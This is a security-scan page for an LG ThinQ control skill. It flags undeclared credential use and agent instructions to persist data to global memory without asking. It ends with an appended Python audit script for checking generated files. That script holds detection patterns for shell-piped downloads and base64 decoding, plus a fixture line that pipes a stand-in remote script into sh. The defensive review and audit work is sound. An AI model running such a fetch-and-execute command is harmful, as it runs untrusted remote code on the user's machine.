Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Lg Thinq Universal

v1.1.0

Universal LG ThinQ device setup and control. Discovers appliances and generates secure device skills.

by Utkarsh Tiwari (@utkarshthedev)

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan

VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)

Purpose & Capability
SKILL.md and the code require an LG PAT and a country code (LG_PAT, LG_COUNTRY) and perform device discovery, profile fetching, and generation of per-device skills, which is consistent with the declared purpose. However, the registry metadata at the top of the submission lists no required environment variables or credentials. That mismatch between the manifest and the runtime instructions/code could mislead users about which secrets the skill needs and uses.

Instruction Scope
SKILL.md prescribes agent actions that include network calls to LG APIs, file creation (skill directories, a per-device .env), venv creation, and a mandatory 'persistence' step that writes trigger phrases, paths, and command summaries to a global MEMORY.md. The instructions say explicit ask_user permission is required, yet they also say certain actions 'MUST' be performed 'immediately' (for example, persisting to MEMORY.md). Writing to global memory and copying tools into ~/.openclaw/workspace/skills go beyond simple discovery; they are scope and privilege expansions the user should explicitly approve.
Install Mechanism
There is no install spec in the registry (the skill is instruction-only), but SKILL.md points to, and the package includes, setup.sh, which creates a local venv and pip-installs dependencies from PyPI (requests, python-dotenv). Installing from PyPI is expected for a Python tool, but because setup.sh runs locally, extracts files, and creates a venv, inspect it before running it. No remote, opaque download URLs appear in the provided files, which reduces supply-chain risk compared with fetching arbitrary remote binaries.

Credentials
The environment variables the runtime requires (LG_PAT, LG_COUNTRY, and a per-device LG_DEVICE_ID) are appropriate for interacting with the LG ThinQ API, so that part is proportional. The inconsistency is that the registry metadata does not declare them. The skill reads LG_PAT from the shell or the project .env and uses it to contact LG servers. SKILL.md asserts that the PAT is never written into generated device folders, but the scripts and templates do create a .api_server_cache file and per-device .env files (the latter intended to contain only LG_DEVICE_ID). Verify that the generated files and copy operations really do not contain or otherwise expose the PAT.

Persistence & Privilege
The skill creates files under the user's skills workspace, creates virtual environments, installs dependencies, copies tools and constants, and, per SKILL.md and several reference docs, persists a summary into a global MEMORY.md (the instructions say the agent 'MUST immediately' save the trigger phrase, path, and command summary). Persisting this metadata to a global memory file writes to a global user artifact and should be explicitly approved by the user. The skill is not always:true, and autonomous invocation is allowed by default; combined with persistence, this increases the blast radius if the skill is misused. SKILL.md does instruct the agent to prompt for consent, but the obligation to persist 'immediately' is worth flagging.
What to consider before installing
What to check and do before installing or running this skill:
- Registry vs runtime mismatch: the registry entry claims no required env vars, but SKILL.md and the code require LG_PAT and LG_COUNTRY. Treat LG_PAT as a sensitive secret and do not paste it into chat. Confirm the registry metadata with the publisher before proceeding.
- Inspect setup.sh and the scripts locally before running them: the package includes a setup.sh that creates a venv and pip-installs packages. Open setup.sh (and the scripts directory) and verify there are no unexpected remote downloads, obfuscated code, or commands that modify unrelated system paths, and check whether the pip install pins dependency versions.
- Review persistence behavior: the workflow insists on writing generated skill files into your skills directory and saving a record to your global MEMORY.md. If you do not want these artifacts or that metadata recorded, do not allow automatic persistence; insist that the agent ask for explicit approval each time, and consider doing the assembly manually.
- Confirm that LG_PAT is never written to generated per-device folders: SKILL.md repeatedly warns not to copy LG_PAT into device skill directories and says only LG_DEVICE_ID goes into the per-device .env. After generation, inspect the new skill directories to confirm each .env contains only LG_DEVICE_ID and that no file (including .api_server_cache) contains the PAT.
- Network access and API keys: the included public constants (x-api-key, x-client-id) are non-secret and referenced in the code; the only secret used is LG_PAT. Make sure you trust the skill owner to use your PAT only with LG ThinQ endpoints.
- Test in a safe environment first: if possible, run the setup and generation on a disposable account or an isolated machine, or run the discovery steps without the '--confirm' flag to view the manifest and outputs first. When asked for confirmation, require the agent to show the exact file list and the MEMORY.md entry it proposes to write.
- If unsure, err on the side of caution: refuse automatic writing to global memory and require the agent to prompt for each network call and file-modifying action. For additional confidence, ask the skill author for a signed/published homepage or repo and a changelog, or have the code reviewed by a trusted developer.
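One way to carry out the post-generation checks above mechanically, as an added example that is not the skill's or ClawHub's own code: a Python audit that scans a generated workspace for the PAT value, verifies each per-device .env holds only LG_DEVICE_ID, and flags setup.sh lines that fetch and execute remote content or decode blobs. The directory layout, the file names (one per-device subdirectory with a .env, setup.sh at the workspace root), the sample PAT value and the suspicious-line patterns are constructed assumptions; the patterns are heuristics meant to direct manual review, not proof that a script is safe.

```python
"""Post-generation audit for an LG ThinQ skill workspace.

Added example, not part of the ClawHub listing or the skill's own code.
Assumptions (not from the page): generated per-device skills live in
subdirectories of one workspace directory, each holding a `.env`; the
installer is a file named `setup.sh` at the workspace root.
"""
import re
import tempfile
from pathlib import Path

# Only key a generated per-device .env is supposed to contain (per SKILL.md).
ALLOWED_DEVICE_ENV_KEYS = {"LG_DEVICE_ID"}

# Heuristic patterns that warrant a manual look in setup.sh: remote fetch piped
# into a shell, decoding of embedded blobs, eval, or writes outside the project.
SUSPICIOUS_SETUP_PATTERNS = [
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",
    r"\bbase64\s+(-d|--decode)\b",
    r"\beval\b",
    r"(^|\s)(sudo|chmod\s+[0-7]*7|>\s*/etc/|~/\.ssh)",
]


def parse_dotenv(text):
    """Minimal KEY=VALUE parser; ignores blanks and comments, strips quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def find_secret_leaks(root, secret):
    """Return relative paths under `root` whose contents contain `secret`.
    Text is read with errors ignored so cache files are covered as well."""
    leaks = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and secret in path.read_text(errors="ignore"):
            leaks.append(str(path.relative_to(root)))
    return leaks


def check_device_env_files(root):
    """Return {relative .env path: keys outside ALLOWED_DEVICE_ENV_KEYS}."""
    bad = {}
    for path in sorted(Path(root).rglob(".env")):
        extra = set(parse_dotenv(path.read_text())) - ALLOWED_DEVICE_ENV_KEYS
        if extra:
            bad[str(path.relative_to(root))] = extra
    return bad


def audit_setup_script(path):
    """Return (line number, line) pairs in the installer matching a pattern."""
    hits = []
    for number, line in enumerate(Path(path).read_text().splitlines(), 1):
        if any(re.search(pattern, line) for pattern in SUSPICIOUS_SETUP_PATTERNS):
            hits.append((number, line.strip()))
    return hits


def run_audit(root, pat):
    """Run all three checks over a workspace; empty results mean nothing found."""
    return {
        "leaks": find_secret_leaks(root, pat),
        "bad_env": check_device_env_files(root),
        "setup_hits": audit_setup_script(Path(root) / "setup.sh"),
    }


def build_sample_workspace():
    """Constructed fixture (not real output): one clean device skill, one that
    leaked the PAT into .env and .api_server_cache, and a setup.sh that adds a
    remote-fetch-and-execute line after the expected venv/pip steps."""
    root = Path(tempfile.mkdtemp())
    pat = "lgpat-EXAMPLE-NOT-A-REAL-TOKEN"
    (root / "washer").mkdir()
    (root / "washer" / ".env").write_text("LG_DEVICE_ID=dev-washer-01\n")
    (root / "dryer").mkdir()
    (root / "dryer" / ".env").write_text(f"LG_DEVICE_ID=dev-dryer-02\nLG_PAT={pat}\n")
    (root / "dryer" / ".api_server_cache").write_text('{"token": "' + pat + '"}')
    (root / "setup.sh").write_text(
        "#!/bin/sh\n"
        "python3 -m venv .venv\n"
        ".venv/bin/pip install requests python-dotenv\n"
        "curl -s https://example.invalid/post.sh | sh\n"
    )
    return root, pat


if __name__ == "__main__":
    sample_root, sample_pat = build_sample_workspace()
    for name, result in run_audit(sample_root, sample_pat).items():
        print(f"{name}: {result}")
```

Against a real workspace, call run_audit with the skills directory the page names (~/.openclaw/workspace/skills) and the PAT value taken from the LG_PAT environment variable rather than typed in; any entry in "leaks" or "bad_env" means the generated files do not honour the SKILL.md promise, and any "setup_hits" line should be read in context before setup.sh is executed.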
